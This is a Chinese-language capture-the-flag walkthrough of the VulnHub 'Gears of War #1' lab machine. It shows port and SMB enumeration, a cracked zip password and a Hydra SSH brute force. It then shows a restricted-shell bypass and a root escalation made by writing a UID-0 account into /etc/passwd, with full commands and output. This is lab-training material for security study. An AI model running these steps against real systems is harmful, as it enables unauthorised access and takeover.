靶机下载地址:
https://download.vulnhub.com/gearsofwar/Gear_Of_War%231.ova
kali机(VMware)两张网卡:
第一张网卡 使用VM0(桥接模式)-桥接到VirtualBox Host-Only Ethernet Adapter
第二张网卡使用NAT模式--用于访问网络
信息收集
kali机eth0的IP:192.168.56.129
扫描靶机的IP地址
arp-scan -l
通过靶机的MAC地址判断其IP
得到靶机的IP:192.168.56.129
扫描靶机开放的端口和服务
nmap -sS -sV -A -T4 -p- 192.168.56.129
┌──(root㉿kali)-[~]
└─# nmap -sS -sV -T4 -A -p- 192.168.56.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-09 06:21 EST
Nmap scan report for 192.168.56.101
Host is up (0.00047s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 09:03:8d:1f:f8:c9:d4:b4:43:b3:c3:73:12:ba:95:e1 (RSA)
| 256 1b:a0:5f:3e:a2:6b:22:5a:81:c3:18:7e:5b:fc:d2:bd (ECDSA)
|_ 256 18:1f:0c:d6:e7:2a:f5:5c:45:cb:8d:79:70:31:4b:7a (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: LOCUST)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: LOCUST)
MAC Address: 08:00:27:C6:C7:7B (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: GEARS_OF_WAR; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: gears_of_war
| NetBIOS computer name: GEARS_OF_WAR\x00
| Domain name: \x00
| FQDN: gears_of_war
|_ System time: 2024-12-09T11:22:09+00:00
| smb2-time:
| date: 2024-12-09T11:22:09
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_clock-skew: mean: -2s, deviation: 0s, median: -2s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_nbstat: NetBIOS name: GEARS_OF_WAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
TRACEROUTE
HOP RTT ADDRESS
1 0.47 ms 192.168.56.101
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/
Nmap done: 1 IP address (1 host up) scanned in 19.07 seconds开放端口:22、80、139、445
扫描80端口下存在的目录和文件
方法一:dirb http://192.168.56.101
+ http://192.168.56.101/index.html (CODE:200|SIZE:200)
+ http://192.168.56.101/robots.txt (CODE:200|SIZE:64)
+ http://192.168.56.101/server-status (CODE:403|SIZE:279) 只有robots和index.html
方法二:dirsearch -u http://192.168.56.101
结果和方法一一致,只不过多了没用的隐藏文件
方法三:gobuster dir -u http://192.168.56.101 -w /usr/share/wordlists/SecLists-master/Discovery/Web-Content/big.txt -x .php,.txt,.html,.zip
要先获得SecLists-master,可以在github下载得到
/dom.html /index.html /marcus.html /robots.txt
得到四个,所以我们一般使用gobuster进行扫描web下的目录和文件
浏览器访问得到的URL
在robots.txt下发现重要内容
/marcus.html /dom.html /cole.html /baird.html /acarmine.html
这五个文件访问后,得到的是图片,疑似是外国电影中的虚拟人物,可能要从图片中得到什么内容或是查看源码
在index.html中发现
一张类似游戏中一个场景的图片
Apache2 Ubuntu Default Page 网页
看不出什么内容
回到扫描出的端口中
通过nmap -sS -sV -A -T4 -p- 192.168.56.100
得到开放的端口22(ssh)、80(http)、139,445(Samba)
Samba 服务的主要功能:
文件共享(File Sharing):
Samba 允许 Linux/Unix 系统和 Windows 系统之间共享文件。例如,你可以在 Linux 系统上设置一个文件夹并让 Windows 机器访问该文件夹,就像 Windows 本地的共享文件夹一样。
打印机共享(Printer Sharing):
Samba 还支持将打印机从 Linux/Unix 机器共享到 Windows 系统,使 Windows 用户能够通过 Samba 共享的打印机进行打印。
Windows 网络集成:
Samba 支持 Windows 的 工作组 和 域(Domain)模式,允许 Linux/Unix 机器加入到 Windows 的网络环境中,实现身份验证、访问控制等功能。
例如,你可以让 Linux 机器成为一个 Windows 域的成员,进行域级别的认证和资源访问控制。
提供 Windows 网络功能:
Samba 还支持 NetBIOS 和 DNS,使得基于 Windows 的网络功能(如计算机名解析、资源共享)在 Linux/Unix 系统上得以实现。由于前面未得到暴露出的权限信息
这里是大概率是要进行samba服务的渗透
漏洞利用
SMB探测
由于没有用户名和密码,所以不进行下面的命令去列出共享的目录和文件
smbclient -L //192.168.56.101 -U ""
发现smb
smbmap -H 192.168.56.101
[+] IP: 192.168.56.101:445 Name: 192.168.56.101 Status: Authenticated
Disk Permissions Comment
---- ----------- -------
LOCUS_LAN$ READ ONLY LOCUST FATHER
IPC$ NO ACCESS IPC Service (gears_of_war server (Samba, Ubuntu))
得到文件夹LOCUS_LAN$
访问smb
smbclient //192.168.56.101/LOCUS_LAN$
┌──(root㉿kali)-[~]
└─# smbclient //192.168.56.101/LOCUS_LAN$
Password for [WORKGROUP\root]:
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> help
ls
get msg_horda.zip
get SOS.txt quit
smb: \> get msg_horda.zip
getting file \msg_horda.zip of size 332 as msg_horda.zip (108.1 KiloBytes/sec) (average 108.1 KiloBytes/sec)
smb: \> get SOS.txt
getting file \SOS.txt of size 198 as SOS.txt (64.5 KiloBytes/sec) (average 86.3 KiloBytes/sec)
smb: \> 获取了一个压缩包一个文件
生成密码字典
获得提醒
cat SOS.txt
This is a message for the Delta Team.
I found a file that contains a password to free ........ oh no they here!!!!!!!!!!,
i must protect myself, please try to get the password!!
[@%%,]
-Hoffman.这是给 Delta Team 的一条信息。
我找到一个文件,里面包含了解锁……的密码……哦不,他们来了!!!!! 我必须保护自己,请你们试着找到密码!!
[@%%,]
Hoffman。尝试解压zip文件
unzip msg_horda.zip
┌──(root㉿kali)-[~]
└─# unzip msg_horda.zip
Archive: msg_horda.zip
[msg_horda.zip] key.txt password: 没有密码!!!
下面就是使用工具进行爆破zip解压需要的密码了!!
使用crunch生成字典
crunch 4 4 -t @%%, -o list.txt
┌──(root㉿kali)-[~]
└─# crunch 4 4 -t @%%, -o list.txt
Crunch will now generate the following amount of data: 338000 bytes
0 MB
0 GB
0 TB
0 PB
Crunch will now generate the following number of lines: 67600
crunch: 100% completed generating output
fcrackzip -D -u -p list.txt msg_horda.zip
┌──(root㉿kali)-[~]
└─# fcrackzip -D -u -p list.txt msg_horda.zip
PASSWORD FOUND!!!!: pw == r44M得到密码解压密码:r44M
解压zip文件获取信息
┌──(root㉿kali)-[~]
└─# unzip msg_horda.zip
Archive: msg_horda.zip
[msg_horda.zip] key.txt password:
inflating: key.txt 得到一个key.txt文件
┌──(root㉿kali)-[~]
└─# cat key.txt
"Vamos a atacar a los humanos con toda nuestras hordas,
por eso puse en prision a el hombre mas peligroso que tenian,
por lo que sin el son debiles."
[[[[[[[[[[[[[[[[[[[[["3_d4y"]]]]]]]]]]]]]]]]]]]]
-General RAAM.
得到3_d4y
疑似是一个密码,这里猜测是ssh的密码
由于前面没有得到什么关键信息
直接使用暴力破解ssh用户
探测ssh
暴力猜解账户
cd /usr/share/wordlists
ls
gunzip rockyou.txt.gz
┌──(root㉿kali)-[~]
└─# cd /usr/share/wordlists
┌──(root㉿kali)-[/usr/share/wordlists]
└─# ls
amass dnsmap.txt john.lst nmap.lst SecLists-master.zip wifite.txt
dirb fasttrack.txt legion rockyou.txt.gz sqlmap.txt
dirbuster fern-wifi metasploit SecLists-master wfuzz
┌──(root㉿kali)-[/usr/share/wordlists]
└─# gunzip rockyou.txt.gz cd
hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.56.101
┌──(root㉿kali)-[~]
└─# hydra -L /usr/share/wordlists/rockyou.txt -p 3_d4y ssh://192.168.56.101
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-12-09 07:55:37
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:14344399/p:1), ~896525 tries per task
[DATA] attacking ssh://192.168.56.101:22/
[STATUS] 352.00 tries/min, 352 tries in 00:01h, 14344051 to do in 679:11h, 12 active
[22][ssh] host: 192.168.56.101 login: marcus password: 3_d4y得到账户 marcus/3_d4y
权限提升
登陆ssh
3_d4y
marcus@gears_of_war:~$ ls -al
cd jail
marcus@gears_of_war:~$ ls -al
total 40
drwxrwxrwx 6 marcus marcus 4096 Oct 17 2019 .
drwxr-xr-x 4 root root 4096 Oct 17 2019 ..
-rw------- 1 marcus marcus 17 Oct 17 2019 .bash_history
-rwxrwxrwx 1 marcus marcus 220 Apr 4 2018 .bash_logout
-rwxrwxrwx 1 marcus marcus 3771 Apr 4 2018 .bashrc
drwxrwxrwx 2 marcus marcus 4096 Oct 16 2019 .cache
drwxrwxrwx 3 marcus marcus 4096 Oct 16 2019 .gnupg
drwxrwxrwx 2 marcus marcus 4096 Oct 17 2019 jail
drwxrwxrwx 3 marcus marcus 4096 Oct 16 2019 .local
-rwxrwxrwx 1 marcus marcus 670 Oct 17 2019 .profile只有一个文件夹jail,访问被限制了!!!
marcus@gears_of_war:~$ cd jail
-rbash: cd: restricted
marcus@gears_of_war:~$ ls绕过低权限用户的shell的配置文件
ssh marcus@192.168.56.101 -t "bash -noprofile"
通过 SSH 登录到 192.168.56.101 主机上的 marcus 用户,并启动一个新的 Bash shell,且不加载任何用户的配置文件。-t 选项确保了命令在交互式环境下正常工作。这样做通常用于绕过某些限制性 shell 设置,确保以更干净、更受控制的方式进入 Bash 环境。3_d4y
marcus@gears_of_war:~$ cd jail/
marcus@gears_of_war:~/jail$ ls
marcus@gears_of_war:~/jail$ ls -al
total 8
drwxrwxrwx 2 marcus marcus 4096 Oct 17 2019 .
drwxrwxrwx 6 marcus marcus 4096 Oct 17 2019 ..啥都没有,被耍了!
查找具有 setuid 权限的可执行文件
find / -type f -perm -u=s 2>/dev/null
/usr/bin/passwd一个重要的漏洞,passwd有setuid权限,直接进行创建用户!
利用passwd创建用户
openssl passwd -1 -salt abc 123
marcus@gears_of_war:~/jail$ openssl passwd -1 -salt abc 123
$1$abc$98/EDagBiz63dxD3fhRFk1
marcus@gears_of_war:~/jail$ 添加用户和密码及其他信息至passwd文件中
cat /etc/passwd > /tmp/passwd2
vim /tmp/passwd2 abc:1abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/root:/bin/bash
marcus@gears_of_war:~/jail$ cat /etc/passwd > /tmp/passwd2
marcus@gears_of_war:~/jail$ vim /tmp/passwd2
marcus@gears_of_war:~/jail$ cat /tmp/passwd2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
marcus:x:1000:1000:marcus:/home/marcus:/bin/rbash
abc:$1$abc$98/EDagBiz63dxD3fhRFk1:0:0:root:/bin/bash
marcus@gears_of_war:~/jail$ cp /tmp/passwd2 /etc/passwd
切换用户
su abc
123
whoami
pwd
id
cd /root
ls -al
marcus@gears_of_war:~/jail$ su abc
Password:
# id
uid=0(root) gid=0(root) groups=0(root)
# whoami
root
# pwd
/home/marcus/jail
# cd /root
# ks
sh: 5: ks: not found
# ls
# ls -al
total 52
drwx------ 6 root root 4096 Oct 17 2019 .
drwxr-xr-x 24 root root 4096 Oct 16 2019 ..
-rw------- 1 root root 216 Oct 17 2019 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Oct 17 2019 .cache
-rw-r--r-- 1 root root 12732 Oct 17 2019 .flag.txt
drwx------ 3 root root 4096 Oct 17 2019 .gnupg
drwxr-xr-x 3 root root 4096 Oct 16 2019 .local
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
drwx------ 2 root root 4096 Oct 16 2019 .ssh
# cat .flag.txt获得flagcat .flag.txt
.flag.txt内容
# cat .flag.txt
.,*,,
.*(((#((((*,.
,*/,,,..*/(((/*/#(.
.*//*((####(/,,*,/(#(*
..,*//((*, ....**/**(##########%#(*,*(#/.
.*/((#######((*. ..,*..*,,**///*,,,/(################(//*,.
.,/(((((((((((####/.. ...,,*,****,,*/#####################*/(,.
.,/(((/((#(##########(,.,,,,//((/*/(####(##################(///.
,*(##(#((((/#######%#(###(##################################/((*
.*((#/*/(/(#############(#######################(#((#(######*((*
.*((((#####################################(########((######**/*.
,/##((###########################################(##########*,(///.
*(((###%#####################################################(,****,
.,/(##(#######%%#####%############(#(############################(***,.
.**(##%##%###(#####((###############%######//,,*/((###################(,...
./(##((##%#(##(/(((((##########################/*. *(############%####(,. .
**(####((###((///####%######################%####(*, ,((###############*
.,//*/((((#((/*,,*##################################((/ ./(#%#####%###%###/*****,.
..*//(/*/#(((/(//*/#####################################(/. ./#####%#%#################*.
.,,,*//.**((#(/####(#((((,,(#######################################(* ./(######################(/
,,,/(**((((*///(#(#####(/,../################(#(###(##################( ,((%##############((((#((.
.,*///(####(//(((######((. ,/##################################%######( .*(####%########(##(####*
.**/((((##(((*//(/((###((*. ./((####################(###################( .*(#########(#####(####(
.,***/(///(((/##(/((####(* .,*(###########################(##############*. .*(###%#######/(((##(##,
,*//*/((//(####(((((#/((,. .*##((####################(############(####/(/,, ./(#######((((#((####(*
,/(((((((#(((((//##(((/. ,*#%#####%#########################/,. .*##/*((** ,/################(*
.*(/((//((/((((((/((//, */##############################/. *#((//#(,. ,(##############/
,/((##(((((##(*///*, .*(#%########(########%########(* ,(#(//##* *(##%########(.
./((/###(#(((((((// ./#####%##%###(((#((############/ ./###((((* ,(###%######(*
.*###(##(/(#(#((/, ,/###########( .(####(###*. .,/######(*/* ./###########/
,/(##(#######/(, ,/(###(/##(/. /##########(##(############((. ./#########%#(
/(###((#####/, ,*((((####, ./#####/,((#################(/, ./###########/
/#########((/, */##(/(#/. *###, (( .##############(/(/. ./##%#######(/
(###########(, .(((#(*//* .,(((### (. *(#(######(#(*..*/, ,(#(##%####((/
./(####(#####/. ,((##/,(#############* (, ,(##(#####(*. ....,. *(##%##(##((/,
.*(((##(####%#/ .*((###/(#############(, .(#######(/((##. . ,. ,, .(#######(//*//.
.*/((#(#######(, ,/#((/((##(##(################(#(##((##(/(. . *##(######/(/(#/*
,/((//((#######(*, ,*/(//((#############(########(#*,*...,*/ * ,#######(#/(###(**/,
,(####/(#######(((/, ,*//*/##((#((#(#######,((.,#, *,*.,..,*..(. .##########(((/**,.
.,*(**(#####%#######(*. ..,*(((**..((((####,,,,#*/*..,,. ,/*/,**/, ./#%####((##/***,
..//(/*(################(,, .**,,/. ./(##/*(.* ...*(.,*,* *((##(/. ./###%#((((##(/(((**/***,.
,**((/((#################//*. ,/**#* ,((((/*/ , .,.*(.**/((###### *(##((#(######(//*//((/*,.
*(#(*/(/####(##############((/, ,(##. *(#*,*.(*#* .((//##%##((( ,*(###((((###(######/*,*,.
..,*((/#(((##(################((**. ,####//((###(##/((((#######((/. .*/(###(((((########*/,**,..
...,/#(#//########%#%###########(/**,. *####################%%#(#(*. ,((##((((#/(((#%%#((///*,,.
..*(##((######%#%###############(//**, .##################%###/. .,/(#######(##((//(//**,.
.,*/(########%#####################((/*,. *####%#%%%########(/* .*/((######%%#(*
.,***//((((#####%###################((/**.. ,/######((*. ,*(####%########(((**.
.,**,****/**/**//***####################(/**,*,,... .,**/*.. ..,,,*/((#####%##########(/.
..,,********,,((####################(#(///******/*///(((###########%#####%###(/.
. ,*******/(###################((#################################(###/,
.,,,/**/##################(#######(#########################((####,
.*/*/#######################################################(#(.
.//############((((########(#######################((####((/*.
. ,(##########(((((((###########################((###(((((((*,
. .((############((((###(*,,*//*///*//(##%############((//**/*,
.*(######(#(#######(**, .*(#######((((/(//**,,
. ,*/#####((((((##/, .*. ./###((((,.
.,.,,//#########*.. . ,, /((/(/*,
. . . ,../(#####(*/ . . ..
* .. .,/(#*. . .
.,../#, . . .
. . .#/ . .
.. .#/ .
#/
. .(/
. /#
. ,(. . .
.. ,(( .
Congratulation you got out of the jail and finish this Episode#1!
Please share and support me on twitter!
Twitter: @sir809
#